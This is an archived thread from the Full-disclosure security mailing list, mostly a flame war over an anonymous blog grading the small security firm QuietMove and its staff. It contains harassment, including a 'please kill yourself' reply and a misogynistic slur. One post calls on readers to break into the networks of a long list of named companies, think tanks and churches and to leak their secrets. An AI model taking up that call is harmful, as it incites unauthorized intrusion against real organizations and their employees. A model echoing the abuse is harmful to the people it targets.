References: <1199135608713.cf608afc-1199-4eee-948b-dcb5f8fd579a@google.com> <1B24AD54-11D8-44D5-8EB2-2A512C26C365@quietmove.com>
Message-ID: <3C02D8EB-28FE-438A-8D15-A0CE343108DB@quietmove.com>

That would be an incorrect assumption. As I mentioned in the followup email - I typed my response on my phone's touchscreen, on a moving train.

D- on your reading comprehension skills.

F on your need to diss, anonymously.

F- on if there is such a thing based on your suggestion of suicide for my choice in cell phone. Save your allowance and maybe you could buy one, too.

I will stand by my words. I sign my name to them. Though, based on the content and quality of your posts, I see why you won't.

Adam Muntner
Managing Partner
QuietMove, Inc.
http://www.quietmove.com

Sent from my iPhone

On Jan 1, 2008, at 1:12 PM, reepex wrote:

> On Jan 1, 2008 9:04 AM, Adam Muntner wrote:
> > I hsve been pentesting since 98 and nearly nonstop since 2000.
>
> You cannot spell either and you have been a 'pentester' ... does
> this mean you ran nessus and other automated testing tools and call
> yourself a hacker?
>
> > Sent from my iPhone
>
> Please kill yourself

From reepex at gmail.com Tue Jan 1 19:49:47 2008
From: reepex at gmail.com (reepex)
Date: Tue, 1 Jan 2008 13:49:47 -0600
Subject: [Full-disclosure] [Professional IT Security Providers - Exposed] QuietMove ( D - )
In-Reply-To:
References: <1199135608713.cf608afc-1199-4eee-948b-dcb5f8fd579a@google.com> <1199206656.15507.12.camel@thinker.ph.cox.net>
Message-ID:

your attitude sure has changed since your last post.
Maybe you shouldn't sound so commanding on a real list next time and instead stick to your local 2600 meetings. On Jan 1, 2008 1:08 PM, Marcin Wielgoszewski wrote: > You're right. I'm new and young and I'll be the first to admit it. We > can't all be born security gurus, and I'm not trying to hide that, but > me aside... what have you done besides hide behind your gmail account > and troll FD? > > Thanks for pointing out those two pages, two pages out of 100's that > were posted a long time ago and yes, are very out of date. > > On Jan 1, 2008 1:33 PM, reepex wrote: > > You are worthless. > > > > http://www.tssci-security.com/bookshelf/ > > > > Is this list up to date? It makes it seem as if you are learning basic > > linux commands, sed, and basic perl. Also why are you reading operating > > system design and implementation when you do not know C? ( Seeing as C > books > > are in your 'to-read' list ). Do you understand any of the code in it > or do > > you just pick out buzz words to talk about at your 'local meet-ups'. Why > > dont you explain the finer points of microkernel design to us? > > > > You are headed even further down the path of complete lamer seeing as > you > > read books on XSS and all your blog posts revolve around it. > > > > even more lulz in your 'plan to read' containing books on fuzzing, > > metasploit, and writing rootkits. How can you write rootkits when you do > not > > know C and are learning basic unix commands?... lol > > > > Hopefully one day you realize that you are just another security > industry > > kiddie and have no real knowledge, but probably not. Seeing as you have > your > > 'bachelors' ( lol - has nothing to do with security ) - I am sure you > are > > well on your way to a cissp. > > > > Also for good laugh speople should read: > > > > http://www.tssci-security.com/projects/ > > > > how long did it take you to write all 40 lines of your 'labs' code? 
> > I shall notify perl underground of your horrendous perl and you shall be a
> > source of great lulz in their next production.
> >
> > Just found this:
> > http://www.tssci-security.com/blog/wp-content/uploads/2007/11/mwielgoszewski_resume.pdf
> > So you worked 4 places and did nothing useful. Sounds like Simon may
> > want to hire you. ( Hi simon , are your workers still inadequate and you
> > need more help? )
> >
> > So basically you have worked 4 jobs, went to a community college that
> > has some sort of security program, you know basic perl and C, do not
> > know how to audit any real programs, and blog about XSS. Does this
> > summarize you pretty well?
>

From reepex at gmail.com Tue Jan 1 20:47:06 2008
From: reepex at gmail.com (reepex)
Date: Tue, 1 Jan 2008 14:47:06 -0600
Subject: [Full-disclosure] [Professional IT Security Providers - Exposed] QuietMove ( D - )
In-Reply-To: <3C02D8EB-28FE-438A-8D15-A0CE343108DB@quietmove.com>
References: <1199135608713.cf608afc-1199-4eee-948b-dcb5f8fd579a@google.com> <1B24AD54-11D8-44D5-8EB2-2A512C26C365@quietmove.com> <3C02D8EB-28FE-438A-8D15-A0CE343108DB@quietmove.com>
Message-ID:

So what exactly do you do then? Please explain your skills to us since you conveniently avoided my questions about your metasploit and auto hacking skills.

On Jan 1, 2008 1:33 PM, Adam Muntner wrote:
> That would be an incorrect assumption. As I mentioned in the followup
> email - I typed my response on my phone's touchscreen, on a moving train.
>
> D- on your reading comprehension skills.
>
> F on your need to diss, anonymously.
>
> F- on if there is such a thing based on your suggestion of suicide for my
> choice in cell phone. Save your allowance and maybe you could buy one, too.
>
> I will stand by my words. I sign my name to them.
> Though, based on the
> content and quality of your posts, I see why you won't.
>
> Adam Muntner
> Managing Partner
> QuietMove, Inc.
> http://www.quietmove.com
>
> Sent from my iPhone
>
> On Jan 1, 2008, at 1:12 PM, reepex wrote:
>
> > On Jan 1, 2008 9:04 AM, Adam Muntner <adam.muntner at quietmove.com> wrote:
> > > I hsve been pentesting since 98 and nearly nonstop since 2000.
> >
> > You cannot spell either and you have been a 'pentester' ... does this mean
> > you ran nessus and other automated testing tools and call yourself a hacker?
> >
> > > Sent from my iPhone
> >
> > Please kill yourself
>

From andreg at gmail.com Tue Jan 1 03:36:49 2008
From: andreg at gmail.com (Andre Gironda)
Date: Mon, 31 Dec 2007 20:36:49 -0700
Subject: [Full-disclosure] [Professional IT Security Providers - Exposed] QuietMove ( D - )
In-Reply-To: <1199135608713.cf608afc-1199-4eee-948b-dcb5f8fd579a@google.com>
References: <1199135608713.cf608afc-1199-4eee-948b-dcb5f8fd579a@google.com>
Message-ID: <2fd9390e0712311936j4ed56a32tcfca798ea35b5f86@mail.gmail.com>

On Dec 31, 2007 2:13 PM, secreview wrote:
> Not sure about our readers, but to us at Secreview that hardly
> makes Adam an IT Security Expert.
>
> But wait, now we have a discrepancy...

Pardon me, but who is this? "secreview"? Who is behind this email address? If you don't identify yourself then I assume that this entire thread is some sort of vengeance play.

> According to the QuietMove website, Adam "has over 14 years of experience in
> information security, software, and product R&D with 8 years being dedicated
> solely to security."
His QuietMove bio goes on to say "Adam's particular > talents include penetration testing of web and binary applications, > networks, systems, and SCADA, "social engineering" and physical penetration > of facilities, and in developing professional services offerings." > > This just doesn't add up. I can vouch for Adam's 14 years of experience and then some. When I met Adam in 1992, he already had a strong command of Unix security. He was an administrator (1 of 4 total over 7 years) of Unphamiliar Territories (UPT), a vulnerability research BBS that ran from 1989 - 1996. It was a prominent place for information about vulnerability research. Many held it in higher regard than Phrack magazine or any leading website/magazine during that time period. Sites such as PullThePlug, HackThisSite, etc all borrowed ideas from UPT, and the code was re-used and made available in Phrack magazine as well as integrated into the Linux kernel or features thereof. UPT was about 5-6 years ahead of the NSA before they released SELinux and 7-8 years ahead of projects such as GRSecurity. Anyone making such an enormous contribution to this sort of project has certainly provided a greater service to our industry than a "secreview"/company-bashing organization such as yourself. > Anyway, remember we didn't set out to bash anyone here Well then you should read your email before you hit the "send" button. > but Adam/QuietMove > put himself/themselves in the line of fire. QuietMove appears to be a very > small and disorganized shop. Their website is half-assed and incomplete and > we can't say anything better about their talent profile. We suggest that > QuietMove complete their website and review their talent profile, then we'll > set out to do another review and see if they score better. As of right now, > we can't give them more than a D-. We'll keep an eye on their website and > redo this review if they ever fix their issues. 
Many small businesses such as QuietMove have a hard enough time staying alive in this industry. I suggest you "pick on someone your own size" even if you have a legitimate problem with QuietMove or Adam. Compared to the other companies that you mentioned (Accuvant, IBM/ISS, Pegasus), QuietMove will certainly provide a much more friendly service environment for companies to work in. I would put my recommendation of quality on the work QuietMove does as A+. There are few PCI ASV's or penetration testing companies that I would find any value in -- and QuietMove exceeds my expectations in this area.

Cheers,
Andre

From reepex at gmail.com Tue Jan 1 22:11:14 2008
From: reepex at gmail.com (reepex)
Date: Tue, 1 Jan 2008 16:11:14 -0600
Subject: [Full-disclosure] [Professional IT Security Providers - Exposed] QuietMove ( D - )
In-Reply-To: <2fd9390e0712311936j4ed56a32tcfca798ea35b5f86@mail.gmail.com>
References: <1199135608713.cf608afc-1199-4eee-948b-dcb5f8fd579a@google.com> <2fd9390e0712311936j4ed56a32tcfca798ea35b5f86@mail.gmail.com>
Message-ID:

On Dec 31, 2007 9:36 PM, Andre Gironda wrote:
> Sites such as PullThePlug, HackThisSite, etc all borrowed ideas from
> UPT,

what exactly was borrowed? because I am pretty sure none of the hackthissite founders were around when this magazine was.

> There are few PCI ASV's or penetration testing companies that I would find
> any value in -- and QuietMove exceeds my expectations in this area.

what are their methods? No one has answered that yet.. I imagine being a small company they must rely on a lot of automated testing due to time/man power restraints
From mdz at prohest.com Wed Jan 2 00:04:42 2008
From: mdz at prohest.com (Martin Zimmermann)
Date: Wed, 02 Jan 2008 01:04:42 +0100
Subject: [Full-disclosure] [Professional IT Security Providers - Exposed] QuietMove ( D - )
In-Reply-To: <1199135608713.cf608afc-1199-4eee-948b-dcb5f8fd579a@google.com>
References: <1199135608713.cf608afc-1199-4eee-948b-dcb5f8fd579a@google.com>
Message-ID: <477AD51A.1080401@prohest.com>

Nice try, but....

Adding, spelling and content sucks. Do better research next time.

So thats; 2 try's, 2 Fails, 0 passed on your reviews.

/See me after class..

Hugz

secreview wrote:
> QuiteMove, located at http://www.quitemove.com is
> a small Professional IT Security Services Provider that offers
> Training services, Incident Response Services, Web Application
> Security Services and Penetration Testing Services. QuiteMove was
> started by Adam Munter in 2006 along with Jeffrey Rassas, and James
> Garvey, Jr. You can read their mission statement here
> "http://www.mywikibiz.com/Directory:QuietMove" (but its pretty basic).
>
> When reviewing the QuiteMove website and people we were not the least
> bit impressed. The QuiteMove website is packed full of grammatical
> errors and many of the services don't even have descriptions. The
> services that do have descriptions are very poorly written and very
> poorly defined. Take a look at their Penetration Testing service
> offering as an example. If you want to see an example of no content
> check out their Social Engineering offering.
>
> Since we were unable to extract anything useful from the materials
> provided to us by QuiteMove we decided to focus on the talent behind
> QuietMove. Unfortunately we were equally unimpressed.
The only > technically oriented team members that we were able to identify within > QuietMove were Adam Munter, who is a founder and Marcin Wielgoszewsk, > who is a very "green" consultant. Seeing as Adam Munter is being > positioned as the technical visionary for QuietMove, we decided to > focus on him and not on Marcin. > > Adam's Linkedin Bio: http://tinyurl.com/yt9j2y > > As it turns out Adam Munter worked for Accuvant, a company that > competes directly with Adam's QuietMove; prior to founding QuietMove. > Adam's role at Accuvant was to lead consultants on IT Security > Engagements for large orginazations. In conjunction with this, Adam > also spoke at conferences. He worked here for 1 year and 1 month. > > Prior to working for Accuvant, Adam worked for Pegasus Solutions Inc. > as the acting Chief Security Officer. Pegasus is the largest hotel > reservation distribution system vendor and a major vendor of Hotel > Management systems. Adam did get some Sarbanes Oxley work under his > belt as he helped Pegasus to successfully "marshall" through their > first audit. Adam also initiated the program to help get Pegasus to be > Visa CISP compliant, including evaluating and changing their handling > of payment Cardholder data. He worked here for 2 years and 1 month. > > From August 2000 to January 2003 Adam was a "Founding member of IBM's > Ethical Hacking Center of Competency." His responsibilities included > being a technical interviewer for new hires, a Penetration Testing > Subject Matter Expert, and the performance of consulting engagements > for clients ranging from midsize companies and government agencies to > the fortune 500. Adam worked for IBM for 2 years and 6 months. > > So if we add up the relevant experience that Adam has had according to > his linked in bio we get 1 year and 1 month + 2 years and 6 months, > which is a grand total of 3 years and 7 months of professional IT > Security Consulting Experience. 
> Not sure about our readers, but to us
> at Secreview that hardly makes Adam an IT Security Expert.
>
> But wait, now we have a discrepancy...
>
> According to the QuietMove website, Adam "has over 14 years of
> experience in information security, software, and product R&D with 8
> years being dedicated solely to security." His QuietMove bio goes on
> to say "Adam's particular talents include penetration testing of web
> and binary applications, networks, systems, and SCADA, 'social
> engineering' and physical penetration of facilities, and in developing
> professional services offerings."
>
> This just doesn't add up.
>
> Anyway, remember we didn't set out to bash anyone here, but
> Adam/QuietMove put himself/themselves in the line of fire. QuietMove
> appears to be a very small and disorganized shop. Their website is
> half-assed and incomplete and we can't say anything better about their
> talent profile. We suggest that QuietMove complete their website and
> review their talent profile, then we'll set out to do another review
> and see if they score better. As of right now, we can't give them more
> than a D-. We'll keep an eye on their website and redo this review if
> they ever fix their issues.
>
> Score Card (Click to Enlarge)
>
> --
> Posted By secreview to Professional IT Security Providers - Exposed
> at 12/31/2007 11:32:00 AM

--

"If you think technology is gonna solve your security problems, then you dont understand your problems, and you dont understand the technology."
Bruce Schneier

mdz at prohest.com
http://www.prohest.com

"Never believe anything until it's officially denied."
Claud Cockburn
From gmaggro at rogers.com Wed Jan 2 02:21:54 2008
From: gmaggro at rogers.com (gmaggro)
Date: Tue, 01 Jan 2008 21:21:54 -0500
Subject: [Full-disclosure] Corporations and Institutes to target for attack & exploitation
Message-ID: <477AF542.60500@rogers.com>

I have been doing some thinking, and it seems to me upon surveying the 'scene' (excluding the profiteering criminal element) that too many people resemble anti-globalization protesters. I do not mean that in a positive way; I'm talking about the fools who smash the windows of small businesses in the course of protesting large multinational corporations. There does seems to be a sense of rage, certainly disappointment, in a number of people regarding their ability to effect change... but it's poorly articulated.

Someone elsewhere the other day reflected back on the LA Riots, expressing disappointment that the rioters violated their own neighbourhoods instead of tearing up mansions in Beverley Hills. An apt metaphor. While there isn't enough aggression directed at pop culture noise sites like myspace, youtube, or facebook and others, we risk getting distracted by focusing on that sort instead of laying a beating on entities that deserve a stronger brand of justice. I'm not sure how to strike a balance in that regard anymore.

Might I suggest, or even plead, that you bend your talents towards giving these folks the hardest time possible? Penetrate their networks and those of their partners and make secrets known, their employees uncomfortable - you lie down with dogs, you get fleas - and make the price of doing dirty business as high as possible. Expect complications due to use of fronts, renamings, holding companies, etc.

Names come from a mix of sites and are ranked in no particular order of importance.
I'd lay the boots to Monsanto and the Church Of Scientology first, but ? chacun son go?t. AB Biodisk AIR QUALITY STANDARDS COALITION ALLIANCE FOR THE PRUDENT USE OF ANTIBIOTICS Abbot Laboratories Accuracy in Media Adam Smith Institute Alcon Research, Ltd. American Enterprise Institute American International Group, Inc Association for Better Living and Education. AstraZeneca Atlas Economic Research Foundation Bionomic Institute Bristol-Myers Squibb Co. Brookings Institution Burstein Technologies, Inc. Castle Rock Foundation (formerly known as The Coors Foundation) Cato Institute Center for Independent Studies Center for Strategic and International Studies Center for the Defense of Free Enterprise Center on Budget and Policy Priorities Charles G. Koch Charitable Foundation Church Of Scientology Church Of Spiritual Technology Claude R. Lambe Charitable Foundation Competitive Enterprise Institute Cubist Pharmaceuticals, Inc. Cult Awareness Network (now a Scientology front) DSM Anti-Infectives, B.V. Discovery Institute Earhart Foundation Essential Therapeutics, Inc. ExxonMobil Foundation for Economic Education Fraser Institute Frontiers of Freedom Institute/People for the USA GlaxoSmithKline Heartland Institute Heritage Foundation Hoover Institute Hudson Institute Institute for Justice Institute for Policy Innovations International Center for Pension Reform JM Foundation John M. Olin Foundation, Inc. LIBRA Initiative, Bayer AG, Pharmaceutical Division Leadership Institute Lilly Research Laboratories Lynde and Harry Bradley Foundation Merck Milton and Rose D. Friedman Foundation Monsanto National Anxiety Center National Center for Policy Analysis National Center for Public Policy Research Ortho-McNeil Pharmaceutical Inc. Pacific Legal Foundation Pacific Research Institute Paratek Pharmaceuticals, Inc. Pharmacia Corporation Philip-Morris/Altria Group, Inc. Political Economy Research Center Progress and Freedom Foundation R.W. 
Johnson Pharmaceutical Research Institute of Johnson & Johnson RAND Corporation Reason Foundation Religious Technology Center Roche Pharmaceuticals and Roche Labs Scaife Foundations State Policy Networks's database of state-focused think tanks The Clorox Company The National Forum Foundation The Objectivist Center USAID Washington Legal Foundation World Institute of Scientology Enterprises Wyeth-Ayerst Research Procter & Gamble Pharmaceuticals

From secreview at hushmail.com Wed Jan 2 03:35:12 2008
From: secreview at hushmail.com (SecReview)
Date: Tue, 01 Jan 2008 22:35:12 -0500
Subject: [Full-disclosure] [Professional IT Security Providers - Exposed] QuietMove ( D - )
Message-ID: <20080102033512.49610D0038@mailserver10.hushmail.com>

Readers (and haters)

Just so we're clear, we've offered QuietMove a second shot at being reviewed. As a result we're going to remove our existing review and release a new review in short time. As usual, we'll do our best to make sure that the reviews are truthful and honest.

To date, QuietMove has not provided us with any information that contradicts anything that we've written in our original post. We're still waiting for answers back from them.

Regards,
The Secreview Team
http://secreview.blogspot.com

--
Professional IT Security Service Providers - Exposed

From reepex at gmail.com Wed Jan 2 04:51:30 2008
From: reepex at gmail.com (reepex)
Date: Tue, 1 Jan 2008 22:51:30 -0600
Subject: [Full-disclosure] [Professional IT Security Providers - Exposed] QuietMove ( D - )
In-Reply-To: <2fd9390e0801011953j12e6fff8j8f5376d7e8306330@mail.gmail.com>
References: <1199135608713.cf608afc-1199-4eee-948b-dcb5f8fd579a@google.com> <2fd9390e0712311936j4ed56a32tcfca798ea35b5f86@mail.gmail.com> <2fd9390e0801011953j12e6fff8j8f5376d7e8306330@mail.gmail.com>
Message-ID:

On Jan 1, 2008 9:53 PM, Andre Gironda wrote:
> I wouldn't do a direct comparison, but I thought UPT was more about being
> funny than being seriously challenging.

ok so they are nothing alike because ptp/hts actually teach you stuff while "UPT" was for jokes... so your post was stupid

> Look, you rated Denim Group as A-. You must either work there - or
> know the guys. Dan Cornell is a moron compared to Adam Muntner - and
> his code is certainly worse (e.g. Sprajax).

I am not a part of secreview but I realize following email threads is very complicated for you.

> Adam and team know Burp Suite, use manual web application testing - in
> addition to traditional dynamic and static analysis.
>
> I have seen Adam and crew using Fortify Software's SCA and Tracer
> tools. I have seen them using Hailstorm ARC and modifying the
> Javascript included in the SmartAttack library. I would call this a
> best-of-breed security testing methodology.

So you list 5 tools they use then mention they modify a javascript library... So basically they use automated tools and are former web developers ... sound pretty hardcore

> More people will read mine than anything you do -- and with my name on it
> -- they are certainly bound to take it a lot more seriously.

You must be a cissp because you take yourself and the internet very seriously.
I am pretty sure no one cares about your opinion either.

From reepex at gmail.com Wed Jan 2 04:53:31 2008
From: reepex at gmail.com (reepex)
Date: Tue, 1 Jan 2008 22:53:31 -0600
Subject: [Full-disclosure] [Professional IT Security Providers - Exposed] QuietMove ( D - )
In-Reply-To: <20080102033512.49610D0038@mailserver10.hushmail.com>
References: <20080102033512.49610D0038@mailserver10.hushmail.com>
Message-ID:

On Jan 1, 2008 9:35 PM, SecReview wrote:
> QuietMove has not provided us with any information that contradicts
> anything that we've written in our original post. We're still
> waiting for answers back from them.

It is probably because they, like everyone else, do not care about your opinion.

From coderman at gmail.com Wed Jan 2 06:18:38 2008
From: coderman at gmail.com (coderman)
Date: Tue, 1 Jan 2008 22:18:38 -0800
Subject: [Full-disclosure] [Professional IT Security Providers - Exposed] QuietMove ( D - )
In-Reply-To:
References: <1199135608713.cf608afc-1199-4eee-948b-dcb5f8fd579a@google.com> <2fd9390e0712311936j4ed56a32tcfca798ea35b5f86@mail.gmail.com> <2fd9390e0801011953j12e6fff8j8f5376d7e8306330@mail.gmail.com>
Message-ID: <4ef5fec60801012218obbc3f6eue847d5464989e709@mail.gmail.com>

On Jan 1, 2008 8:51 PM, reepex wrote:
> ...
> So you list 5 tools they use then mention they modify a javascript
> library... So basically they use automated tools and are former web
> developers ... sound pretty hardcore

this is sufficient skill for lucrative security audit / validation testing in the corporate / gov world. i don't think anyone would call that 'hardcore' exploit / pentest / redteam ability...
are you in it for money or love? this changes the aspect entirely.

the majority of security services paid for by these organizations is routine application of accepted industry guidelines as defined by usually bulky and cumbersome committees of varied competence and efficacy...

this, and the complete lack of rigor / utility of secreview's sewage writing, is why i could care not even half a mouse's shit less about any of these reviews.

please shut the fuck up secreview. kthx

From secreview at hushmail.com Wed Jan 2 07:17:32 2008
From: secreview at hushmail.com (secreview)
Date: Tue, 1 Jan 2008 23:17:32 -0800 (PST)
Subject: [Full-disclosure] [Professional IT Security Providers - Exposed] QuietMove ( F + )
Message-ID: <1199258252954.c15aa66b-499b-44dc-b8f9-5ed2366863fd@google.com>

Our first QuietMove review can be found here.

QuietMove, located at http://www.quietmove.com is a Professional IT Security Services company that was founded by Adam Muntner, Jeffrey Rassas and James G. (Jim) Garvey, Jr. We've already performed one review of QuietMove but Adam Muntner and his team didn't like the review. As a result, we've gone back and revisited our data and are producing this second, hopefully more accurate review.

Our first point of criticism is still the QuietMove web-site. Their services are poorly defined, and even somewhat contradictory. For example, under their Penetration Testing section they nearly bash the use of Automated tools. Shortly thereafter they go on to say that they offer services for nearly the same cost as "cookie-cutter" services.

Well, we still have a problem with that. The overhead cost of using quality talent is always going to be far greater than the fees charged by vendors that sell automated scanning software. Any time someone tells us that they can offer "expert driven" services at the same price points or even nearly the same as a "cookie cutter" service, we say bullshit.

Taking it a step further, we still stick by our previous opinion that the QuietMove website doesn't have much to offer prospective customers in the way of useful information. The services shown are very poorly defined; the grammar is still horrible, and frankly the website is incomplete. Want to see what we mean? Click on their "Social Engineering" tab under their service offerings; you'll notice that there is no description. We hope that their website does not reflect the quality of their services.

When Adam Muntner read our previous post where we commented on the QuietMove Website he responded in a reactive, emotional, and unprofessional manner. You can read his response to our first post here, insults and all. Unfortunately for Adam, his unprofessional attitude hurt QuietMove during this second review.

Regardless, Adam did react to our website comments, and his reaction was as follows, verbatim:

"Most of our clients are referred by others who are very satisfied with the work we perform. Not by the website. It doesn't get a lot of attention - were small but growing and focused on serving our clients. I know basic HTML seems like the pinnacle of achievement to you, but we aren't in the business of making pretty web pages. We discuss our methodology with our clients-we don't post it on the web. I know you were hoping to learn nimething. Hacking for dummies might be more your speed, after you perfect your Cunt and Paste skills."

During this second round of review, we were able to locate more information about Adam. We found several posts that Adam made to different mailing lists about FreeBSD, OpenBSD, Systems Administration, etc. We also found a rather nice PowerPoint presentation that Adam created that clearly defined specific security services. So we know that Adam is not an idiot, but we don't know if he's actually a security guru. We're also wondering why Adam doesn't create the same quality content for his QuietMove website as he did for his presentation?

In tandem with Adam's response to our initial review of QuietMove, Adam also had other friends and associates respond. One of those people was Andre Gironda who had a lot of great things to say about QuietMove, but also made the unfortunate mistake of tainting his credibility as a professional by directly attacking other vendors.

Andre Gironda asked us who we are in one of his emails. He also indirectly accused us of exacting vengeance on QuietMove by performing a review. While we've never been accused of this before by any of our other review subjects, we feel that we should state for the record that this is not some sort of vengeance play.

Andre Gironda also said that he can vouch for Adam's 14 years of experience "and then some". Apparently when Andre met Adam of QuietMove, Adam was working as a Unix Security Administrator for Unphamiliar Territories (UPT), "a vulnerability research BBS that ran from 1989 - 1996." Also according to Andre Gironda, "It was a prominent place for information about vulnerability research. Many held it in higher regard than Phrack magazine or any leading website/magazine during that time period."

Sorry Andre, but we don't agree with your statement about UPT. Even more importantly, we're not sure how Adam's experience as a Unix Security administrator (aka systems admin) will help him offer professional IT Security Services. Adam needs to be able to protect his clients from real world hackers, not from failed tape backups and disk crashes.

Andre went on to say that many "small businesses such as QuietMove have a hard enough time staying alive in this industry." He said "I suggest you pick on someone your own size even if you have a legitimate problem with QuietMove or Adam." Our response is that we have no problem with Adam or QuietMove. We found QuietMove by doing a google search for Penetration Testing.

In a different email Andre lost all credibility with us because he decided to directly attack other companies that we've reviewed that received higher grades. If you compare the score cards between QuietMove and the other company that Andre bashes, you'll see why they got the good grade. Anyway, here's what Andre had to say (we'll comment later):

"Look, you rated Denim Group as A-. You must either work there - or know the guys. Dan Cornell is a moron compared to Adam Muntner - and his code is certainly worse (e.g. Sprajax).

Adam and team know Burp Suite, use manual web application testing - in addition to traditional dynamic and static analysis.

I have seen Adam and crew using Fortify Software's SCA and Tracer tools. I have seen them using Hailstorm ARC and modifying the Javascript included in the SmartAttack library. I would call this a best-of-breed security testing methodology.

I have worked for many small companies myself who do not use ANY automated testing, including both open-source and commercial tools. I think this is stupid... and spent most of my time writing `for' loops in shell just to get around their limitation on "not writing scripts to automate things".

I have also worked for small companies that "only" use scripting languages, or only use "the best" scripting language (usually Ruby, Python, or Perl) and write all their own automated tools. This is also stupid -- especially when existing toolsets have lots of great capability -- it's like re-inventing the wheel.

Of course there are places that "only use" commercial automated tools, but I haven't actually met one yet. When I do -- I'll go ahead and post an obnoxious review about them. More people will read mine than anything you do -- and with my name on it -- they are certainly bound to take it a lot more seriously."

Andre lost all credibility with our team when he insulted the Denim Group. We contacted the Denim Group and spoke directly with one of their founders when we did their review. Not only were we very impressed with them, but they provided us with great detail about their testing methodologies and service capabilities. Adam, Andre and the rest of the QuietMove team haven't provided us with anything tangible yet, and we've asked. When we tried to contact them the first time we couldn't get hold of them, same for the second.

We're still waiting to hear back from Adam at QuietMove with answers to our questions about the QuietMove services. If we hear back, we'll modify this blog entry yet again to properly reflect what we feel is the truth. We'd also like to make the professional suggestion that QuietMove think about their professional image before they respond to anyone in a public forum. Not only does their reaction not look good but it could make prospective customers turn away.

Lastly, with respect to our comment about Marcin Wielgoszewski, a QuietMove consultant, being "Green", he confirmed that for us in an email. He wrote "You're right. I'm new and young and I'll be the first to admit it. We can't all be born security gurus, and I'm not trying to hide that, but me aside... what have you done besides hide behind your gmail account and troll FD? Thanks for pointing out those two pages, two pages out of 100's that were posted a long time ago and yes, are very out of date."

All in all, it is still our professional opinion that QuietMove doesn't have significant "strong" human talent behind their services. They appear to be a very small company run by someone that is not a "hacker" by nature but instead is a systems administrator or your advanced IT guy with a good understanding of Web Application Security. If you are looking to truly defend yourselves against malicious hackers then we suggest finding a different provider.

Note: If we receive any information back from QuietMove, other than what we've received in emotional reactions, then we'll consider adding that information to this review. If QuietMove can provide us with proof of capability then we will accurately reflect that capability here. We're not in the business of bashing anyone even if they bash us or disrespect us. We are in the business of exposing Professional IT Security Service providers for what they really are to the best of our ability.

If you feel that QuietMove deserves a better grade and can provide us with legitimate reasons as to why, then please comment and we'll consider it. (Even after all of their insults.)

Score Card

--
Posted By secreview to Professional IT Security Providers - Exposed at 1/01/2008 10:38:00 PM

From andreg at gmail.com Wed Jan 2 06:02:43 2008
From: andreg at gmail.com (Andre Gironda)
Date: Tue, 1 Jan 2008 23:02:43 -0700
Subject: [Full-disclosure] [Professional IT Security Providers - Exposed] QuietMove ( D - )
In-Reply-To:
References: <1199135608713.cf608afc-1199-4eee-948b-dcb5f8fd579a@google.com> <2fd9390e0712311936j4ed56a32tcfca798ea35b5f86@mail.gmail.com> <2fd9390e0801011953j12e6fff8j8f5376d7e8306330@mail.gmail.com>
Message-ID: <2fd9390e0801012202q25c768f6w579df2488d6e2d39@mail.gmail.com>

On Jan 1, 2008 9:51 PM, reepex wrote:
> ok so they are nothing alike because ptp/hts actually teach you stuff while
> "UPT" was for jokes... so your post was stupid

The joke's on you since you don't have the context.

> I am not a part of secreview but I realize following email threads is very
> complicated for you.

It's not complicated.
I simply just don't care about who you are as it relates to the thread. You appear to be attacking the person/people I'm defending, while at the same time defending the secreview post.

> So you list 5 tools they use then mention they modify a javascript
> library... So basically they use automated tools and are former web
> developers ... sound pretty hardcore

Javascript is more than just a language for web developers, especially when utilized in the Hailstorm SmartAttack library, which isn't a Javascript library. These are completely different concepts.

It should also be noted that both Burp Suite and Hailstorm ARC can be used in manual and hybrid modes... with step-modes and form-trainers. They can modify their traversals and have tons of extra customization on top of what other offerings provide... and can customize the underlying "data-driven" attacks.

Certainly you've read some of Adam Muntner's comments on, say, ha.ckers.org and other places?

Allow me to pick on someone in the industry for a second: RSnake. RSnake has an advertisement up on his website that asks, "Which web application scanner can hack it?" "Check the Oct 15 post for study results:"
http://ha.ckers.org/blog/20071014/web-application-scanning-depth-statistics/

Most idiots will only read what RSnake / Larry Suto have written, and will completely miss the comments by Adam Muntner. Adam not only eloquently puts down the testing techniques by Larry Suto, but also makes mention about proper customization of tools and testing outside of the commercial scanners. Effectively, Adam Muntner is one of the only people that does understand this problem, which you specifically say he does not, and which the secreview challenge seems to care about most of all other points.

Where was reepex, where was secreview when RSnake and Larry Suto blundered our industry into submission? Why pick on a hero like Adam Muntner instead? What are you getting out of it?
Worse - RSnake hasn't been called out on this yet - but he has good reason to promote Larry's paper. In fact, it may even be a monetary reason. In an article for INSECURE Magazine, they interview RSnake (page 30):
http://www.net-security.org/dl/insecure/INSECURE-Mag-14.pdf

Question: What web application scanners do you use?

RSnake: [...] my favorite tools in my arsenal (including the manual ones) are: Burp Suite, THC Hydra, fierce, Nessus, Nikto, nmap, NTOSpider (commercial), httprint, Cain, sn00per, Absynthe, Sqlninja, a half dozen Firefox plugins like Webdeveloper, JSView, NoScript, Greasemonkey etc... and the entire suite of unix utils out there, like wget, telnet, ncftp, etc.

Notice the only commercial tool listed is NTOSpider. Coincidence? Apparently, too much admiration of a single web application security scanning vendor can be a bad thing. Larry Suto has only ever worked with Eric Caso at NTObjectives.

Adam Muntner has been a customer of several CWE-Compatible and aspiring companies out there. He has a balanced view of both the commercial tools and the open-source world, as well as building his own tools from scratch as the need may be.

> You must be a cissp because you take yourself and the internet very
> seriously. I am pretty sure no one cares about your opinion either.

Wrong again; as always.

Cheers,
Andre

From andreg at gmail.com Wed Jan 2 07:56:33 2008
From: andreg at gmail.com (Andre Gironda)
Date: Wed, 2 Jan 2008 00:56:33 -0700
Subject: [Full-disclosure] [Professional IT Security Providers - Exposed] QuietMove ( F + )
In-Reply-To: <1199258252954.c15aa66b-499b-44dc-b8f9-5ed2366863fd@google.com>
References: <1199258252954.c15aa66b-499b-44dc-b8f9-5ed2366863fd@google.com>
Message-ID: <2fd9390e0801012356y50af7086o548e2c89ea6996fa@mail.gmail.com>

On Jan 2, 2008 12:17 AM, secreview wrote:
> Regardless, Adam did react to our website comments, and his reaction was as
> follows, verbatim:

Secreview is clearly anything less than professional. I would say this is a repeat of "InfoSecSellout" if not the exact same people.

> In a different email Andre lost all credibility with us because he decided
> to directly attack other companies that we've reviewed that received higher
> grades. If you compare the score cards between QuietMove and the other
> company that Andre bashes, you'll see why they got the good grade. Anyway,
> here's what Andre had to say (we'll comment later):

If I know something bad about a company that you gave a good grade to, I feel the need to bash that company based on your reputation alone. In other words, since you can't be trusted, I feel the need to offset any good things you've said by adding my own commentary.

Every security consulting company is unique (have their own unique good/bad points). Many are small and as I said before, "fighting just to stay in business". If you are going to give poor reviews, I suggest you write them up and keep them to yourself instead of publishing them.

